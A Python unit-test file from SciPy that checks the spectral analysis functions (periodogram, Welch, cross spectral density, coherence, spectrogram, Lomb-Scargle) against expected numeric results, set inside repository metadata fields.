| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
58876b6dd481253122151eeb628995760aee43cb
| 31,200
|
py
|
Python
|
scipy/signal/tests/test_spectral.py
|
xu-hong-/scipy
|
f737001cf0a75654efe09a1de5cdf5d1895bda59
|
[
"BSD-3-Clause"
] | 6,989
|
2017-07-18T06:23:18.000Z
|
2022-03-31T15:58:36.000Z
|
scipy/signal/tests/test_spectral.py
|
xu-hong-/scipy
|
f737001cf0a75654efe09a1de5cdf5d1895bda59
|
[
"BSD-3-Clause"
] | 1,978
|
2017-07-18T09:17:58.000Z
|
2022-03-31T14:28:43.000Z
|
scipy/signal/tests/test_spectral.py
|
xu-hong-/scipy
|
f737001cf0a75654efe09a1de5cdf5d1895bda59
|
[
"BSD-3-Clause"
] | 1,228
|
2017-07-18T09:03:13.000Z
|
2022-03-29T05:57:40.000Z
|
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from numpy.testing import assert_raises, assert_approx_equal, \
assert_, run_module_suite, TestCase,\
assert_allclose, assert_array_equal,\
assert_array_almost_equal_nulp, dec
from scipy import signal, fftpack
from scipy._lib._version import NumpyVersion
from scipy.signal import (periodogram, welch, lombscargle, csd, coherence,
spectrogram)
class TestPeriodogram(TestCase):
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_real_onesided_odd(self):
x = np.zeros(15)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8)
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-15)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = np.ones(16)/16.0
q[0] = 0
assert_allclose(p, q)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, scaling='spectrum')
g, q = periodogram(x, scaling='density')
assert_allclose(f, np.linspace(0, 0.5, 9))
assert_allclose(p, q/16.0)
def test_integer_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_integer_odd(self):
x = np.zeros(15, dtype=int)
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8)
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-15)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = np.ones(16)/16.0
q[0] = 0
assert_allclose(p, q)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
f, p = periodogram(x)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = 5.0*np.ones(16)/16.0
q[0] = 0
assert_allclose(p, q)
def test_unk_scaling(self):
assert_raises(ValueError, periodogram, np.zeros(4, np.complex128),
scaling='foo')
def test_nd_axis_m1(self):
x = np.zeros(20, dtype=np.float64)
x = x.reshape((2,1,10))
x[:,:,0] = 1.0
f, p = periodogram(x)
assert_array_equal(p.shape, (2, 1, 6))
assert_array_almost_equal_nulp(p[0,0,:], p[1,0,:], 60)
f0, p0 = periodogram(x[0,0,:])
assert_array_almost_equal_nulp(p0[np.newaxis,:], p[1,:], 60)
def test_nd_axis_0(self):
x = np.zeros(20, dtype=np.float64)
x = x.reshape((10,2,1))
x[0,:,:] = 1.0
f, p = periodogram(x, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_array_almost_equal_nulp(p[:,0,0], p[:,1,0], 60)
f0, p0 = periodogram(x[:,0,0])
assert_array_almost_equal_nulp(p0, p[:,1,0])
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, 10, 'hann')
win = signal.get_window('hann', 16)
fe, pe = periodogram(x, 10, win)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
def test_padded_fft(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x)
fp, pp = periodogram(x, nfft=32)
assert_allclose(f, fp[::2])
assert_allclose(p, pp[::2])
assert_array_equal(pp.shape, (17,))
def test_empty_input(self):
f, p = periodogram([])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = periodogram(np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = periodogram(np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_short_nfft(self):
x = np.zeros(18)
x[0] = 1
f, p = periodogram(x, nfft=16)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_nfft_is_xshape(self):
x = np.zeros(16)
x[0] = 1
f, p = periodogram(x, nfft=16)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9)
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.linspace(0, 0.5, 9))
q = np.ones(9, 'f')
q[0] = 0
q[-1] /= 2.0
q /= 8
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(15, 'f')
x[0] = 1
f, p = periodogram(x)
assert_allclose(f, np.arange(8.0)/15.0)
q = np.ones(8, 'f')
q[0] = 0
q *= 2.0/15.0
assert_allclose(p, q, atol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
f, p = periodogram(x, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = np.ones(16, 'f')/16.0
q[0] = 0
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
f, p = periodogram(x)
assert_allclose(f, fftpack.fftfreq(16, 1.0))
q = 5.0*np.ones(16, 'f')/16.0
q[0] = 0
assert_allclose(p, q)
assert_(p.dtype == q.dtype)
class TestWelch(TestCase):
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_onesided_odd(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, scaling='spectrum')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.015625, 0.02864583, 0.04166667, 0.04166667,
0.02083333])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_odd(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = welch(x, nperseg=8)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.41666667, 0.38194444, 0.55555556, 0.55555556,
0.55555556, 0.55555556, 0.55555556, 0.38194444])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_unk_scaling(self):
assert_raises(ValueError, welch, np.zeros(4, np.complex128),
scaling='foo', nperseg=4)
def test_detrend_linear(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = welch(x, nperseg=10, detrend='linear')
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_no_detrending(self):
x = np.arange(10, dtype=np.float64) + 0.04
f1, p1 = welch(x, nperseg=10, detrend=False)
f2, p2 = welch(x, nperseg=10, detrend=lambda x: x)
assert_allclose(f1, f2, atol=1e-15)
assert_allclose(p1, p2, atol=1e-15)
def test_detrend_external(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = welch(x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_m1(self):
x = np.arange(40, dtype=np.float64) + 0.04
x = x.reshape((2,2,10))
f, p = welch(x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
x = np.rollaxis(x, 2, 0)
f, p = welch(x, nperseg=10, axis=0,
detrend=lambda seg: signal.detrend(seg, axis=0, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_nd_axis_m1(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
f, p = welch(x, nperseg=10)
assert_array_equal(p.shape, (2, 1, 6))
assert_allclose(p[0,0,:], p[1,0,:], atol=1e-13, rtol=1e-13)
f0, p0 = welch(x[0,0,:], nperseg=10)
assert_allclose(p0[np.newaxis,:], p[1,:], atol=1e-13, rtol=1e-13)
def test_nd_axis_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((10,2,1))
f, p = welch(x, nperseg=10, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_allclose(p[:,0,0], p[:,1,0], atol=1e-13, rtol=1e-13)
f0, p0 = welch(x[:,0,0], nperseg=10)
assert_allclose(p0, p[:,1,0], atol=1e-13, rtol=1e-13)
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = welch(x, 10, 'hann', 8)
win = signal.get_window('hann', 8)
fe, pe = welch(x, 10, win, 8)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
def test_empty_input(self):
f, p = welch([])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = welch(np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = welch(np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
def test_short_data(self):
x = np.zeros(8)
x[0] = 1
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
f, p = welch(x)
f1, p1 = welch(x, nperseg=8)
assert_allclose(f, f1)
assert_allclose(p, p1)
def test_window_long_or_nd(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
assert_raises(ValueError, welch, np.zeros(4), 1,
np.array([1,1,1,1,1]))
assert_raises(ValueError, welch, np.zeros(4), 1,
np.arange(6).reshape((2,3)))
def test_nondefault_noverlap(self):
x = np.zeros(64)
x[::8] = 1
f, p = welch(x, nperseg=16, noverlap=4)
q = np.array([0, 1./12., 1./3., 1./5., 1./3., 1./5., 1./3., 1./5.,
1./6.])
assert_allclose(p, q, atol=1e-12)
def test_bad_noverlap(self):
assert_raises(ValueError, welch, np.zeros(4), 1, 'hann', 2, 7)
def test_nfft_too_short(self):
assert_raises(ValueError, welch, np.ones(12), nfft=3, nperseg=4)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = welch(x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.11111111,
0.07638889], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = welch(x, nperseg=8)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.41666666, 0.38194442, 0.55555552, 0.55555552,
0.55555558, 0.55555552, 0.55555552, 0.38194442], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype,
'dtype mismatch, %s, %s' % (p.dtype, q.dtype))
def test_padded_freqs(self):
x = np.zeros(12)
nfft = 24
f = fftpack.fftfreq(nfft, 1.0)[:nfft//2+1]
f[-1] *= -1
fodd, _ = welch(x, nperseg=5, nfft=nfft)
feven, _ = welch(x, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
nfft = 25
f = fftpack.fftfreq(nfft, 1.0)[:(nfft + 1)//2]
fodd, _ = welch(x, nperseg=5, nfft=nfft)
feven, _ = welch(x, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
class TestCSD:
def test_pad_shorter_x(self):
x = np.zeros(8)
y = np.zeros(12)
f = np.linspace(0, 0.5, 7)
c = np.zeros(7,dtype=np.complex128)
f1, c1 = csd(x, y, nperseg=12)
assert_allclose(f, f1)
assert_allclose(c, c1)
def test_pad_shorter_y(self):
x = np.zeros(12)
y = np.zeros(8)
f = np.linspace(0, 0.5, 7)
c = np.zeros(7,dtype=np.complex128)
f1, c1 = csd(x, y, nperseg=12)
assert_allclose(f, f1)
assert_allclose(c, c1)
def test_real_onesided_even(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_onesided_odd(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_twosided(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_real_spectrum(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, scaling='spectrum')
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.015625, 0.02864583, 0.04166667, 0.04166667,
0.02083333])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_even(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_onesided_odd(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_integer_twosided(self):
x = np.zeros(16, dtype=int)
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.07638889])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_complex(self):
x = np.zeros(16, np.complex128)
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = csd(x, x, nperseg=8)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.41666667, 0.38194444, 0.55555556, 0.55555556,
0.55555556, 0.55555556, 0.55555556, 0.38194444])
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
def test_unk_scaling(self):
assert_raises(ValueError, csd, np.zeros(4, np.complex128),
np.ones(4, np.complex128), scaling='foo', nperseg=4)
def test_detrend_linear(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = csd(x, x, nperseg=10, detrend='linear')
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_no_detrending(self):
x = np.arange(10, dtype=np.float64) + 0.04
f1, p1 = csd(x, x, nperseg=10, detrend=False)
f2, p2 = csd(x, x, nperseg=10, detrend=lambda x: x)
assert_allclose(f1, f2, atol=1e-15)
assert_allclose(p1, p2, atol=1e-15)
def test_detrend_external(self):
x = np.arange(10, dtype=np.float64) + 0.04
f, p = csd(x, x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_m1(self):
x = np.arange(40, dtype=np.float64) + 0.04
x = x.reshape((2,2,10))
f, p = csd(x, x, nperseg=10,
detrend=lambda seg: signal.detrend(seg, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_detrend_external_nd_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
x = np.rollaxis(x, 2, 0)
f, p = csd(x, x, nperseg=10, axis=0,
detrend=lambda seg: signal.detrend(seg, axis=0, type='l'))
assert_allclose(p, np.zeros_like(p), atol=1e-15)
def test_nd_axis_m1(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((2,1,10))
f, p = csd(x, x, nperseg=10)
assert_array_equal(p.shape, (2, 1, 6))
assert_allclose(p[0,0,:], p[1,0,:], atol=1e-13, rtol=1e-13)
f0, p0 = csd(x[0,0,:], x[0,0,:], nperseg=10)
assert_allclose(p0[np.newaxis,:], p[1,:], atol=1e-13, rtol=1e-13)
def test_nd_axis_0(self):
x = np.arange(20, dtype=np.float64) + 0.04
x = x.reshape((10,2,1))
f, p = csd(x, x, nperseg=10, axis=0)
assert_array_equal(p.shape, (6,2,1))
assert_allclose(p[:,0,0], p[:,1,0], atol=1e-13, rtol=1e-13)
f0, p0 = csd(x[:,0,0], x[:,0,0], nperseg=10)
assert_allclose(p0, p[:,1,0], atol=1e-13, rtol=1e-13)
def test_window_external(self):
x = np.zeros(16)
x[0] = 1
x[8] = 1
f, p = csd(x, x, 10, 'hann', 8)
win = signal.get_window('hann', 8)
fe, pe = csd(x, x, 10, win, 8)
assert_array_almost_equal_nulp(p, pe)
assert_array_almost_equal_nulp(f, fe)
def test_empty_input(self):
f, p = csd([],np.zeros(10))
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
f, p = csd(np.zeros(10),[])
assert_array_equal(f.shape, (0,))
assert_array_equal(p.shape, (0,))
for shape in [(0,), (3,0), (0,5,2)]:
f, p = csd(np.empty(shape), np.empty(shape))
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
f, p = csd(np.ones(10), np.empty((5,0)))
assert_array_equal(f.shape, (5,0))
assert_array_equal(p.shape, (5,0))
f, p = csd(np.empty((5,0)), np.ones(10))
assert_array_equal(f.shape, (5,0))
assert_array_equal(p.shape, (5,0))
def test_empty_input_other_axis(self):
for shape in [(3,0), (0,5,2)]:
f, p = csd(np.empty(shape), np.empty(shape), axis=1)
assert_array_equal(f.shape, shape)
assert_array_equal(p.shape, shape)
f, p = csd(np.empty((10,10,3)), np.zeros((10,0,1)), axis=1)
assert_array_equal(f.shape, (10,0,3))
assert_array_equal(p.shape, (10,0,3))
f, p = csd(np.empty((10,0,1)), np.zeros((10,10,3)), axis=1)
assert_array_equal(f.shape, (10,0,3))
assert_array_equal(p.shape, (10,0,3))
def test_short_data(self):
x = np.zeros(8)
x[0] = 1
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
f, p = csd(x, x)
f1, p1 = csd(x, x, nperseg=8)
assert_allclose(f, f1)
assert_allclose(p, p1)
def test_window_long_or_nd(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1,
np.array([1,1,1,1,1]))
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1,
np.arange(6).reshape((2,3)))
def test_nondefault_noverlap(self):
x = np.zeros(64)
x[::8] = 1
f, p = csd(x, x, nperseg=16, noverlap=4)
q = np.array([0, 1./12., 1./3., 1./5., 1./3., 1./5., 1./3., 1./5.,
1./6.])
assert_allclose(p, q, atol=1e-12)
def test_bad_noverlap(self):
assert_raises(ValueError, csd, np.zeros(4), np.ones(4), 1, 'hann',
2, 7)
def test_nfft_too_short(self):
assert_raises(ValueError, csd, np.ones(12), np.zeros(12), nfft=3,
nperseg=4)
def test_real_onesided_even_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8)
assert_allclose(f, np.linspace(0, 0.5, 5))
q = np.array([0.08333333, 0.15277778, 0.22222222, 0.22222222,
0.11111111], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
def test_real_onesided_odd_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=9)
assert_allclose(f, np.arange(5.0)/9.0)
q = np.array([0.15958227, 0.24193957, 0.24145224, 0.24100919,
0.24377353], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_real_twosided_32(self):
x = np.zeros(16, 'f')
x[0] = 1
x[8] = 1
f, p = csd(x, x, nperseg=8, return_onesided=False)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.08333333, 0.07638889, 0.11111111,
0.11111111, 0.11111111, 0.11111111, 0.11111111,
0.07638889], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype)
@dec.skipif(NumpyVersion(np.__version__) < '1.8.0')
def test_complex_32(self):
x = np.zeros(16, 'F')
x[0] = 1.0 + 2.0j
x[8] = 1.0 + 2.0j
f, p = csd(x, x, nperseg=8)
assert_allclose(f, fftpack.fftfreq(8, 1.0))
q = np.array([0.41666666, 0.38194442, 0.55555552, 0.55555552,
0.55555558, 0.55555552, 0.55555552, 0.38194442], 'f')
assert_allclose(p, q, atol=1e-7, rtol=1e-7)
assert_(p.dtype == q.dtype,
'dtype mismatch, %s, %s' % (p.dtype, q.dtype))
def test_padded_freqs(self):
x = np.zeros(12)
y = np.ones(12)
nfft = 24
f = fftpack.fftfreq(nfft, 1.0)[:nfft//2+1]
f[-1] *= -1
fodd, _ = csd(x, y, nperseg=5, nfft=nfft)
feven, _ = csd(x, y, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
nfft = 25
f = fftpack.fftfreq(nfft, 1.0)[:(nfft + 1)//2]
fodd, _ = csd(x, y, nperseg=5, nfft=nfft)
feven, _ = csd(x, y, nperseg=6, nfft=nfft)
assert_allclose(f, fodd)
assert_allclose(f, feven)
class TestCoherence:
def test_identical_input(self):
x = np.random.randn(20)
y = np.copy(x) # So `y is x` -> False
f = np.linspace(0, 0.5, 6)
C = np.ones(6)
f1, C1 = coherence(x, y, nperseg=10)
assert_allclose(f, f1)
assert_allclose(C, C1)
def test_phase_shifted_input(self):
x = np.random.randn(20)
y = -x
f = np.linspace(0, 0.5, 6)
C = np.ones(6)
f1, C1 = coherence(x, y, nperseg=10)
assert_allclose(f, f1)
assert_allclose(C, C1)
class TestSpectrogram:
def test_average_all_segments(self):
x = np.random.randn(1024)
fs = 1.0
window = ('tukey', 0.25)
nperseg = 16
noverlap = 2
f, _, P = spectrogram(x, fs, window, nperseg, noverlap)
fw, Pw = welch(x, fs, window, nperseg, noverlap)
assert_allclose(f, fw)
assert_allclose(np.mean(P, axis=-1), Pw)
class TestLombscargle:
def test_frequency(self):
"""Test if frequency location of peak corresponds to frequency of
generated input signal.
"""
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Plot a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
P = lombscargle(t, x, f)
# Check if difference between found frequency maximum and input
# frequency is less than accuracy
delta = f[1] - f[0]
assert_(w - f[np.argmax(P)] < (delta/2.))
def test_amplitude(self):
"""Test if height of peak in normalized Lomb-Scargle periodogram
corresponds to amplitude of the generated input signal.
"""
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Plot a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
pgram = lombscargle(t, x, f)
# Normalize
pgram = np.sqrt(4 * pgram / t.shape[0])
# Check if difference between found frequency maximum and input
# frequency is less than accuracy
assert_approx_equal(np.max(pgram), ampl, significant=2)
def test_wrong_shape(self):
t = np.linspace(0, 1, 1)
x = np.linspace(0, 1, 2)
f = np.linspace(0, 1, 3)
assert_raises(ValueError, lombscargle, t, x, f)
def test_zero_division(self):
t = np.zeros(1)
x = np.zeros(1)
f = np.zeros(1)
assert_raises(ZeroDivisionError, lombscargle, t, x, f)
def test_lombscargle_atan_vs_atan2(self):
# https://github.com/scipy/scipy/issues/3787
# This raised a ZeroDivisionError.
t = np.linspace(0, 10, 1000, endpoint=False)
x = np.sin(4*t)
f = np.linspace(0, 50, 500, endpoint=False) + 0.1
q = lombscargle(t, x, f*2*np.pi)
if __name__ == "__main__":
run_module_suite()
| 34.210526
| 79
| 0.539968
| 4,842
| 31,200
| 3.359769
| 0.059686
| 0.105852
| 0.02969
| 0.038358
| 0.896914
| 0.88585
| 0.878903
| 0.870113
| 0.857819
| 0.850566
| 0
| 0.134174
| 0.306058
| 31,200
| 911
| 80
| 34.248079
| 0.6172
| 0.031667
| 0
| 0.80343
| 0
| 0
| 0.007463
| 0
| 0
| 0
| 0
| 0
| 0.261214
| 1
| 0.117414
| false
| 0
| 0.009235
| 0
| 0.134565
| 0.001319
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
